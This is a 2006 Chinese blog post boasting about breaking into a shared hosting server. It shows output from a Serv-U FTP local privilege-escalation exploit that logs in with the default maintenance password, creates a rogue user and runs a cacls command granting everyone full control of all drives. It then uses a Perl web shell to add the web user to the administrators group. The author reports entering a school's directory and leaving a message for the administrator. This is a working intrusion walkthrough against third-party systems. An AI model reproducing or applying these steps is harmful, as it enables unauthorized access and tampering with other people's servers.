你BT我更BT!记一次入侵BT服务器
2006-07-04 20:33:05 来源:WEB开发网Serv-u>3.xLocalExploitbyxiaolu
<220Serv-UFTPServerv5.2forWinSockready...
>USERLocalAdministrator
<331Usernameokay,needpassword.
******************************************************
>PASS#l@$ak#.lk;0@P
<230Userloggedin,proceed.
******************************************************
>SITEMAINTENANCE
******************************************************
[+]CreatingNewDomain...
<200-DomainID=2
<220Domainsettingssaved
******************************************************
[+]Domainxl:2Created
[+]CreatingEvilUser
<200-User=xl
200Usersettingssaved
******************************************************
[+]NowExploiting...
>USERxl
<331Usernameokay,needpassword.
******************************************************
>PASS111111
<230Userloggedin,proceed.
******************************************************
[+]NowExecuting:cacls.exec:/E/T/Geveryone:F
<220Domaindeleted
******************************************************
每提交完一次都稍微等一下,因为这些命令需要时间处理的,不一会儿,就把所有分区设置为everyone完全控制了,可以任意操作硬盘的东西了,但是有些命令还是受了限制,因为权限还没有提升,现在我们把自己的用户提升为管理员: http://anyhost//cmd.pl?d:\user\bin\su.exe " net l ... s IUSR_anyhost /add"
现在我们通过web方式,执行的命令就是以administrator的身份执行的了,相信到这里,下面的事该做什么,大家应该知道了吧?马上找到那个学校的目录,进去咯~~目的达到了,本来还想做一个3389的肉鸡的,想想算了,这种BT管理员的地盘,我也占领不了多久,留点提示到他的桌面就over了。
说真的,搞安全这么久,从来没有遇见这么棘手的虚拟主机,要不是装了Perl,还真是束手无策!本文技术含量不高,只是分享一下希望其中的思路,如果有一个人从中受益,这篇文章就完成它的使命了。
更多精彩
赞助商链接